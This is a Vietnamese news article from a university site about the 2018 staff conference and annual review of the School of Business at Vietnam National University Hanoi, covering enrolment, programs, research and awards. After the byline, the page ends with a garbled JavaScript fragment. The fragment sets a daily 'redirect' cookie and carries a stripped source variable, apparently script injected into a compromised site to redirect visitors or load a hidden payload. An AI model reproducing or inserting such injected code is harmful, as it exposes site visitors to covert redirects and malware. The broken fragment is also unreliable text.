HSB Hoi-nghi-CCVC 6Trong chặng dài lịch sử 23 năm phát triển, Khoa QT&KD với vị thế là Khoa tự chủ đặc biệt, 1 trong 14 đơn vị thành viên cấp trường trong mô hình Đại học Quốc gia Hà Nội đã khẳng định được thương hiệu mang tầm quốc gia và quốc tế.

Ngày 28/8/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã tổ chức thành công Hội nghị Công chức Viên chức và Tổng kết năm học 2017 – 2018.

Hội nghị được vinh dự đón tiếp PGS.TS Nguyễn Hoàng Hải – Phó Giám đốc ĐHQGHN, GS.TS Nguyễn Đình Đức – Trưởng ban Đào tạo và lãnh đạo các phòng ban chuyên môn của ĐHQGHN.

Tại Hội nghị, Đoàn Chủ tịch đã trình bày Báo cáo Tổng kết năm học 2017 – 2018 và Phương hướng kế hoạch nhiệm vụ năm học 2018 – 2019 của Khoa QT&KD. Theo đó, trong chặng dài lịch sử 23 năm phát triển, Khoa QT&KD với vị thế là Khoa tự chủ đặc biệt, 1 trong 14 đơn vị thành viên cấp trường trong mô hình Đại học Quốc gia Hà Nội đã khẳng định được thương hiệu mang tầm quốc gia và quốc tế.

Năm học 2017 – 2018, Khoa QT&KD đã đứng trước nhiều cơ hội và thách thức, trong đó có việc tiếp tục thực hiện Nghị quyết của CP về đổi mới cơ bản và toàn diện giáo dục đại học Việt Nam với mục tiêu “Đến 2020 giáo dục đại học Việt Nam phải đạt trình độ tiên tiến trong khu vực và tiếp cận trình độ tiên tiến trên thế giới, có năng lực cạnh tranh cao, thích ứng với cơ chế thị trường định hướng XHCN”. Đây là yếu tố tạo ra niềm tin, cơ hội thúc giục HSB tiếp tục đi tiên phong thực hiện đường lối của Đảng và Nhà Nước trong lĩnh vực mà HSB có khả năng cạnh tranh nổi bật tại Việt Nam. Bên cạnh đó, sự quan tâm lãnh đạo và ủng hộ của Giám đốc ĐHGQHN trong việc thực hiện Đề án phát triển HSB thành Trường ĐH QT&KD vào năm 2020 là động lực to lớn để đội ngũ HSB thực hiện sứ mệnh lịch sử của mình.

HSB Hoi-nghi-CCVC 5

Tiết mục chào mừng rất trẻ trung của đội ngũ cán bộ viên chức HSB

Về kết quả thực hiện kế hoạch nhiệm vụ năm học 2017 – 2018, Khoa QT&KD đã đạt được một số thành tựu nổi bật sau:

1. Tuyển sinh

Năm học 2017 – 2018, Khoa QT&KD được ĐHQGHN phân bổ 160 chỉ tiêu tuyển sinh cho hai chương trình đào tạo MNS và HSB – MBA. Chương trình đào tạo IPAG-MBM tuyển sinh theo cơ chế riêng của đơn vị đối tác. Từ kỳ tuyển sinh sau đại học đợt 1 năm 2017, Khoa QT&KD là đơn vị tiên phong áp dụng tuyển sinh theo phương thức mới là xét tuyển và phỏng vấn theo Quyết định số 3772/QĐ-ĐHQGHN và nhận được nhiều phản hồi tích cực từ phía học viên.

2. Đào tạo

Về đào tạo dài hạn:

• Khoa QT&KD đang trong quá trình xây dựng chiến lược trở thành trường Đại học vào năm 2020, hiện đang triển khai 03 chương trình đào tạo thạc sĩ: Thạc sĩ Quản trị Kinh doanh (HSB – MBA), giảng dạy bằng tiếng Anh, do ĐHQGHN cấp bằng; Thạc sĩ Khoa học Quản trị Kinh doanh (HSB – IPAG), giảng dạy bằng tiếng Anh, do trường Kinh doanh IPAG (CH Pháp) cấp bằng; Thạc sĩ Quản trị An ninh phi truyền thống (MNS), giảng dạy bằng tiếng Việt, do ĐHQGHN cấp bằng. Trong đó, chương trình đào tạo HSB – MBA là chương trình đào tạo chất lượng cao, được xếp thứ hạng cao (xếp hạng 27 các chương trình MBA các nước khu vực Viễn Đông của tổ chức “The Eduniversal Ranking” năm 2017). Ngoài ra, chương trình đào tạo HSB – MBA còn là thành viên của Hiệp hội các Trường kinh doanh Châu Á Thái Bình Dương – AAPBS và Hiệp hội các Trường Kinh doanh xuất sắc của Mỹ – AACSB từ rất lâu.

• Chương trình đào tạo thạc sĩ Quản trị Kinh doanh (HSB – MBA) của Khoa được tiến hành kiểm định đồng cấp trong ĐHQGHN, tiến đến kiểm định chất lượng theo tiêu chuẩn của AUN – QA trong tháng 12/2018. Đây là chương trình đào tạo thạc sĩ Quản trị Kinh doanh đầu tiên của đơn vị cũng như của ĐHQGHN đăng ký kiểm định chất lượng quốc tế.

• Nhóm tác giả 2 chương trình đào tạo: Tiến sĩ chuyên ngành Quản trị và Phát triển bền vững (DMS), Cử nhân Quản trị Doanh nghiệp và Công nghệ (MET) đã bảo vệ thành công đề án mở chương trình đào tạo cấp ĐHQGHN.

• Quy mô đào tạo Sau đại học của Khoa QT&KD hiện nay là 406 học viên, trong đó 123 học viên MNS, 232 học viên HSB – MBA, 51 học viên HSB – IPAG.

• Năm học 2017 – 2018, Khoa QT&KD đã tổ chức bảo vệ luận văn cho 105 học viên hai chương trình đào tạo thạc sĩ Quản trị Kinh doanh (HSB – MBA), thạc sĩ Quản trị An ninh Phi truyển thống (MNS), trong đó có 56 học viên HSB-MBA và 49 MNS đã tốt nghiệp và nhận bằng thạc sĩ.

• Chương trình đào tạo HSB – MBA và HSB – IPAG đã và đang thu hút được nhiều đối tượng học viên, trong đó có một số học viên là đến từ các nước như Hàn Quốc, Đức, Đài Loan. Tính đến tháng 07/2018, có 10 học viên người nước ngoài đăng ký phỏng vấn đầu vào, kết quả có 08 học viên theo học chính thức.

• Trong tháng 6/2018, Khoa QT&KD đã cử 21 học viên chương trình đào tạo HSB – IPAG tham gia học phần Quản trị tài chính tại Trường Kinh doanh Ipag, Cộng hòa Pháp.

HSB Hoi-nghi-CCVC 6

Về đào tạo ngắn hạn: Năm học 2017-2018, Trung tâm Đào tạo và Tư vấn Quản trị (HCC) thuộc HSB đã thiết kế và triển khai thành công hơn 70 chương trình đào tạo & tư vấn theo nhu cầu của các doanh nghiệp, tổ chức, Tổng Công ty/Tập đoàn trong và ngoài nước như: Samsung Việt Nam, EVN Hà Nội, Agribank, BIDV, Sungroup, Vinataba, Welstory, Vicem, PECC1, Thăng Long TLE, Sở nội vụ tỉnh Phú Thọ…

• Đặc biệt, năm học vừa qua Trung tâm đã nghiên cứu nhiều phương pháp học tập mới và tiên tiến như phương pháp học tập qua trải nghiệm (Experiental Learning) và phương pháp học tập theo dự án (Project – based Learning); ứng dụng triển khai thành công phương pháp mới cho một chuỗi các chương trình đào tạo Mini-MBA, Pre-MBA; thu hút sự tham gia của hàng trăm học viên đến từ Samsung Display Việt Nam, Samsung Electronics Việt Nam và Samsung Electro-Mechanics Thái Nguyên.

• Về mảng triển khai các chương trình đào tạo quốc tế: HCC đã triển khai thành công chương trình khảo sát thị trường đầu tư tại Việt Nam cho các doanh nhân đến từ liên đoàn doanh nghiệp Singapore; tiếp tục duy trì các lớp đào tạo tín chỉ ngắn hạn cho sinh viên thuộc nhiều chuyên ngành khác nhau đến từ Đại học Công nghệ Nanyang (NTU), Singapore; tổ chức các chương trình khám phá lịch sử văn hóa Việt Nam cho các đoàn sinh viên đến từ trường Đại học Công nghiệp Tây Bắc, một số trường đại học ở Bắc Kinh và Tây An, Trung Quốc. Đặc biệt, Trung tâm đã ký kết thỏa thuận hợp tác với Trường Đại học Deakin, Úc về việc tổ chức chương trình thực tập sinh quốc tế, triển khai hàng năm, chương trình đầu tiên bắt đầu từ ngày 16/11-2/12/2018.

HSB Hoi-nghi-CCVC 2

PGS.TS Nguyễn Hoàng Hải trao tặng Giấy khen cho 6 đồng chí đạt danh hiệu Chiến sĩ thi đua cấp cơ sở

HSB Hoi-nghi-CCVC 3

Đại diện Công đoàn ĐHQGHN trao tặng danh hiệu Công đoàn viên xuất sắc

3. Công tác nghiên cứu Khoa học và Công nghệ

• Trong hoạt động nghiên cứu và xuất bản, HSB đã đạt những thành tích xuất sắc với 07 bài báo quốc tế, 01 bài báo đăng trên tạp chí khoa học trong nước, xuất bản 02 sách trong nước góp phần quan trọng trong thành tích nghiên cứu chung của ĐQHGHN.

• HSB đã thành lập Nhóm nghiên cứu Khoa học Công nghệ đảm bảo an ninh môi trường do PGS.TS.Hoàng Đình Phi lãnh đạo. Hiện nay, nhóm nghiên cứu Khoa học Công nghệ đảm bảo an ninh môi trường đang tham gia trực tiếp vào hoạt động nghiên cứu, tư vấn và chuyển giao công nghệ liên quan tới lĩnh vực môi trường, xử lý chất thải và phát triển làng nghề với các Sở, Ban, Ngành của TP.Hà Nội.

• Năm học 2017-2018, Khoa QT&KD đã triển khai thực hiện năm thứ 2 của đề tài cấp ĐQHGHN “Quản trị tri thức để thúc đẩy đổi mới sáng tạo trong môi trường đại học – nghiên cứu tại các trường đại học thành viên ĐHQGHN” do PGS.TS.Nguyễn Ngọc Thắng làm Chủ nhiệm đề tài.

4. Hợp tác phát triển

• Năm học 2017-2018, HSB đã đón và làm việc với các đối tác nước ngoài như: Trường Đại học Deakin, UF, Trung Quốc, Nhật, Pháp, Ngân hàng Công nghiệp Hàn Quốc (IBK), Ngân hàng Shinhan, Trường Đại học Cyprus…

• Khoa QT&KD đã và đang đàm phán để tăng cường hợp tác đào tạo, trao đổi sinh viên quốc tế, tổ chức các hội thảo, nghiên cứu khoa học với nhiều đối tác trong ASEAN, châu Á và trên thế giới.
5. Phát triển đội ngũ giảng viên cơ hữu và kiêm nhiệm chất lượng cao là khâu đột phá của HSB trong năm học qua. Hiện nay, HSB đang có đội ngũ 51 Cán bộ, giảng viên, chuyên viên, nhân viên, 19 giảng viên cơ hữu, 28 giảng viên thỉnh giảng.

Các giảng viên của HSB đều là những giảng viên chất lượng cao, có nhiều giảng viên là tiến sĩ du học nước ngoài. Thêm vào đó, HSB cũng mời các giảng viên là người nước ngoài đến đơn vị tham gia giảng dạy, nghiên cứu, trao đổi học thuật. Vì vậy, các giảng viên cơ hữu của HSB luôn có cơ hội giao lưu, chia sẻ, trau dồi kiến thức, kỹ năng sư phạm và nâng cao khả năng tiếng Anh.

HSB Hoi-nghi-CCVC 8

12 cá nhân được trao tặng danh hiệu Hoàn thành xuất sắc nhiệm vụ năm học 2017 – 2018

Tiếp nối những thành công đó, khoa QT&KD quyết tâm thực hiện các nhiệm vụ năm học mới 2018 – 2019 theo định hướng: Thực hiện đúng đường lối của Đảng về đổi mới căn bản và toàn diện giáo dục Việt Nam, phát huy tinh thần tự chủ, dám nghĩ, dám làm, làm một cách sáng tạo để phát triển bền vững thương hiệu HSB trực thuộc Đại học Quốc gia Hà Nội, đảm bảo HSB liên tục là đơn vị đi tiên phong trong việc phát triển các chương trình đào tạo mới và liên ngành. Tầm nhìn đến năm 2020, HSB đổi tên thành Trường Đại học QT&KD liên ngành đầu tiên của Việt Nam có chương trình đạt chuẩn quốc tế và được xếp hạng trong khu vực Châu Á.

HSB Hoi-nghi-CCVC 7

PGS.TS Nguyễn Hoàng Hải – Phó Giám đốc ĐHQGHN chúc mừng những kết quả ấn tượng trong năm học qua của Khoa QT&KD

Đánh giá cao những thành tựu đạt được của Khoa QT&KD trong năm học qua, PGS.TS Nguyễn Hoàng Hải – Phó Giám đốc ĐHQGHN cho biết: “HSB có 3 thứ xứng đáng gọi là “đặc sản”: Đi tiên phong và là tấm gương để nhân rộng mô hình tự chủ hoàn toàn trong các đơn vị của ĐHQGHN; Hoạt động đào tạo gắn liền với nhu cầu trực tiếp của doanh nghiệp và xã hội; Đội ngũ nhà khoa học, giảng viên sáng tạo, năng động, đi đầu trong các chương trình đào tạo liên ngành. Những “đặc sản” này đã làm nên thương hiệu và chất lượng đào tạo vượt trội của Khoa QT&KD”. PGS.TS Nguyễn Hoàng Hải cũng rất ấn tượng về đội ngũ cán bộ trẻ trung, giàu sức sáng tạo, đoàn kết của HSB, và tin tưởng đó là sức mạnh để Khoa QT&KD phát triển thành công hơn nữa trong thời gian tới.

Thùy Dung

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}